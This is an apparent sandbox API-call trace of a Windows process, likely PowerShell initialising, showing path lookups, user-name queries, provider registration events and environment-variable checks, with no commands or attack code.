[0080.828] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xccf30 | out: lpFileInformation=0xccf30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x5492b1a0, ftLastAccessTime.dwHighDateTime=0x1d34750, ftLastWriteTime.dwLowDateTime=0x5492b1a0, ftLastWriteTime.dwHighDateTime=0x1d34750, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0080.828] SetErrorMode (uMode=0x1) returned 0x1
[0080.828] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xcccd0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
[0080.828] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xccb80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
[0080.828] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0080.828] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xccab0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
[0080.828] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0080.828] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccb00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
[0080.828] SetErrorMode (uMode=0x1) returned 0x1
[0080.829] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xccd60 | out: lpFileInformation=0xccd60*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x5492b1a0, ftLastAccessTime.dwHighDateTime=0x1d34750, ftLastWriteTime.dwLowDateTime=0x5492b1a0, ftLastWriteTime.dwHighDateTime=0x1d34750, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0080.829] SetErrorMode (uMode=0x1) returned 0x1
[0080.829] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccb00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
[0080.829] SetErrorMode (uMode=0x1) returned 0x1
[0080.829] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xccd60 | out: lpFileInformation=0xccd60*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x5492b1a0, ftLastAccessTime.dwHighDateTime=0x1d34750, ftLastWriteTime.dwLowDateTime=0x5492b1a0, ftLastWriteTime.dwHighDateTime=0x1d34750, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0080.829] SetErrorMode (uMode=0x1) returned 0x1
[0080.829] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccba0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
[0080.829] SetErrorMode (uMode=0x1) returned 0x1
[0080.829] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcce00 | out: lpFileInformation=0xcce00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x5492b1a0, ftLastAccessTime.dwHighDateTime=0x1d34750, ftLastWriteTime.dwLowDateTime=0x5492b1a0, ftLastWriteTime.dwHighDateTime=0x1d34750, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0080.829] SetErrorMode (uMode=0x1) returned 0x1
[0080.829] CoTaskMemAlloc (cb=0x804) returned 0x1b826f50
[0080.829] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b826f50, nSize=0xcd208 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0xcd208) returned 0x1
[0080.836] CoTaskMemFree (pv=0x1b826f50)
[0080.836] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0080.836] GetUserNameW (in: lpBuffer=0x321480, pcbBuffer=0xcd248 | out: lpBuffer="aETAdzjz", pcbBuffer=0xcd248) returned 1
[0080.837] CoTaskMemFree (pv=0x321480)
[0080.837] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3c1ed90*="FileSystem", lpRawData=0x3c1eb20) returned 1
[0080.838] CoTaskMemAlloc (cb=0x104) returned 0x2c7570
[0080.838] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c7570, nSize=0x80 | out: lpBuffer="") returned 0x0
[0080.838] CoTaskMemFree (pv=0x2c7570)
[0080.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.838] CoTaskMemAlloc (cb=0x804) returned 0x1b826f50
[0080.838] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b826f50, nSize=0xcd208 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0xcd208) returned 0x1
[0080.839] CoTaskMemFree (pv=0x1b826f50)
[0080.839] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0080.839] GetUserNameW (in: lpBuffer=0x321480, pcbBuffer=0xcd248 | out: lpBuffer="aETAdzjz", pcbBuffer=0xcd248) returned 1
[0080.839] CoTaskMemFree (pv=0x321480)
[0080.839] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3c24580*="Function", lpRawData=0x3c24310) returned 1
[0080.842] CoTaskMemAlloc (cb=0x104) returned 0x2c7570
[0080.842] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c7570, nSize=0x80 | out: lpBuffer="") returned 0x0
[0080.842] CoTaskMemFree (pv=0x2c7570)
[0080.846] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.846] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.846] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.846] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.973] CoTaskMemAlloc (cb=0x804) returned 0x1b826f50
[0080.973] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b826f50, nSize=0xcd208 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0xcd208) returned 0x1
[0080.973] CoTaskMemFree (pv=0x1b826f50)
[0080.973] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0080.973] GetUserNameW (in: lpBuffer=0x321480, pcbBuffer=0xcd248 | out: lpBuffer="aETAdzjz", pcbBuffer=0xcd248) returned 1
[0080.974] CoTaskMemFree (pv=0x321480)
[0080.974] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d87808*="Registry", lpRawData=0x2d87598) returned 1
[0080.979] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.979] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.979] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.979] CoTaskMemAlloc (cb=0x804) returned 0x1b826f50
[0080.979] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b826f50, nSize=0xcd208 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0xcd208) returned 0x1
[0080.985] CoTaskMemFree (pv=0x1b826f50)
[0080.985] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0080.985] GetUserNameW (in: lpBuffer=0x321480, pcbBuffer=0xcd248 | out: lpBuffer="aETAdzjz", pcbBuffer=0xcd248) returned 1
[0080.985] CoTaskMemFree (pv=0x321480)
[0080.986] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d8cbd0*="Variable", lpRawData=0x2d8c960) returned 1
[0080.987] CoTaskMemAlloc (cb=0x104) returned 0x2c7570
[0080.987] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c7570, nSize=0x80 | out: lpBuffer="") returned 0x0
[0080.987] CoTaskMemFree (pv=0x2c7570)
[0081.006] CoTaskMemAlloc (cb=0x104) returned 0x2c7570
[0081.006] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c7570, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.006] CoTaskMemFree (pv=0x2c7570)
[0081.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xccab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
[0081.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcca00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
[0081.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcca00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
[0081.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcca00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
[0081.097] CoTaskMemAlloc (cb=0x804) returned 0x1b826f50
[0081.097] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b826f50, nSize=0xcd208 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0xcd208) returned 0x1
[0081.097] CoTaskMemFree (pv=0x1b826f50)
[0081.097] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0081.097] GetUserNameW (in: lpBuffer=0x321480, pcbBuffer=0xcd248 | out: lpBuffer="aETAdzjz", pcbBuffer=0xcd248) returned 1
[0081.097] CoTaskMemFree (pv=0x321480)
[0081.098] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2da0d08*="Certificate", lpRawData=0x2da0a98) returned 1
[0081.166] CoTaskMemAlloc (cb=0x104) returned 0x2c7570
[0081.166] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c7570, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.166] CoTaskMemFree (pv=0x2c7570)
[0081.168] GetLogicalDrives () returned 0x4
[0081.168] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xcce90, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
[0081.168] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0081.169] CoTaskMemAlloc (cb=0x20e) returned 0x38a090
[0081.169] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x38a090 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop") returned 0x19
[0081.169] CoTaskMemFree (pv=0x38a090)
[0081.170] CoTaskMemAlloc (cb=0x104) returned 0x2c7570
[0081.170] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c7570, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.170] CoTaskMemFree (pv=0x2c7570)
[0081.170] CoTaskMemAlloc (cb=0x104) returned 0x2c7570
[0081.170] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c7570, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.170] CoTaskMemFree (pv=0x2c7570)
[0081.180] CoTaskMemAlloc (cb=0x104) returned 0x2c7570
[0081.180] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c7570, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.180] CoTaskMemFree (pv=0x2c7570)
[0081.181] CoTaskMemAlloc (cb=0x104) returned 0x2c7570
[0081.181] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c7570, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.181] CoTaskMemFree (pv=0x2c7570)
[0081.181] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0xccbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19
[0081.181] SetErrorMode (uMode=0x1) returned 0x1
[0081.181] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0xcce50 | out: lpFileInformation=0xcce50*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xd5210210, ftLastAccessTime.dwHighDateTime=0x1d34cee, ftLastWriteTime.dwLowDateTime=0xd5210210, ftLastWriteTime.dwHighDateTime=0x1d34cee, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0081.181] SetErrorMode (uMode=0x1) returned 0x1
[0081.181] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0xccbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19
[0081.181] SetErrorMode (uMode=0x1) returned 0x1
[0081.182] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0xcce50 | out: lpFileInformation=0xcce50*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xd5210210, ftLastAccessTime.dwHighDateTime=0x1d34cee, ftLastWriteTime.dwLowDateTime=0xd5210210, ftLastWriteTime.dwHighDateTime=0x1d34cee, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0081.182] SetErrorMode (uMode=0x1) returned 0x1
[0081.182] CoTaskMemAlloc (cb=0x104) returned 0x2c7570
[0081.182] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c7570, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.182] CoTaskMemFree (pv=0x2c7570)
[0081.183] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0xccd90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19
[0081.183] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccc00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
[0081.183] SetErrorMode (uMode=0x1) returned 0x1
[0081.183] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcce10 | out: lpFileInformation=0xcce10*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x5492b1a0, ftLastAccessTime.dwHighDateTime=0x1d34750, ftLastWriteTime.dwLowDateTime=0x5492b1a0, ftLastWriteTime.dwHighDateTime=0x1d34750, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0081.183] SetErrorMode (uMode=0x1) returned 0x1
[0081.183] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccc00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
[0081.183] SetErrorMode (uMode=0x1) returned 0x1
[0081.183] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcce10 | out: lpFileInformation=0xcce10*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x5492b1a0, ftLastAccessTime.dwHighDateTime=0x1d34750, ftLastWriteTime.dwLowDateTime=0x5492b1a0, ftLastWriteTime.dwHighDateTime=0x1d34750, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0081.184] SetErrorMode (uMode=0x1) returned 0x1
[0081.184] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccc10, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
[0081.184] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xccb00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
[0081.184] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xccc00, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
[0081.184] SetErrorMode (uMode=0x1) returned 0x1
[0081.184] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0xcce10 | out: lpFileInformation=0xcce10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
[0081.184] SetErrorMode (uMode=0x1) returned 0x1
[0081.184] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xccc00, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
[0081.184] SetErrorMode (uMode=0x1) returned 0x1
[0081.184] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0xcce10 | out: lpFileInformation=0xcce10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
[0081.184] SetErrorMode (uMode=0x1) returned 0x1
[0081.184] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xccc10, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
[0081.184] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0xccb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
[0081.184] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0xccc00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
[0081.184] SetErrorMode (uMode=0x1) returned 0x1
[0081.184] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0xcce10 | out: lpFileInformation=0xcce10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0081.184] SetErrorMode (uMode=0x1) returned 0x1
[0081.184] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0xccc00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
[0081.185] SetErrorMode (uMode=0x1) returned 0x1
[0081.185] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0xcce10 | out: lpFileInformation=0xcce10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0081.185] SetErrorMode (uMode=0x1) returned 0x1
[0081.185] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0xccc10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
[0081.185] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\.", nBufferLength=0x105, lpBuffer=0xccb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
[0081.185] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0xccc00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19
[0081.185] SetErrorMode (uMode=0x1) returned 0x1
[0081.185] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0xcce10 | out: lpFileInformation=0xcce10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xd5210210, ftLastAccessTime.dwHighDateTime=0x1d34cee, ftLastWriteTime.dwLowDateTime=0xd5210210, ftLastWriteTime.dwHighDateTime=0x1d34cee, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0081.185] SetErrorMode (uMode=0x1) returned 0x1
[0081.185] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0xccc00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19
[0081.185] SetErrorMode (uMode=0x1) returned 0x1
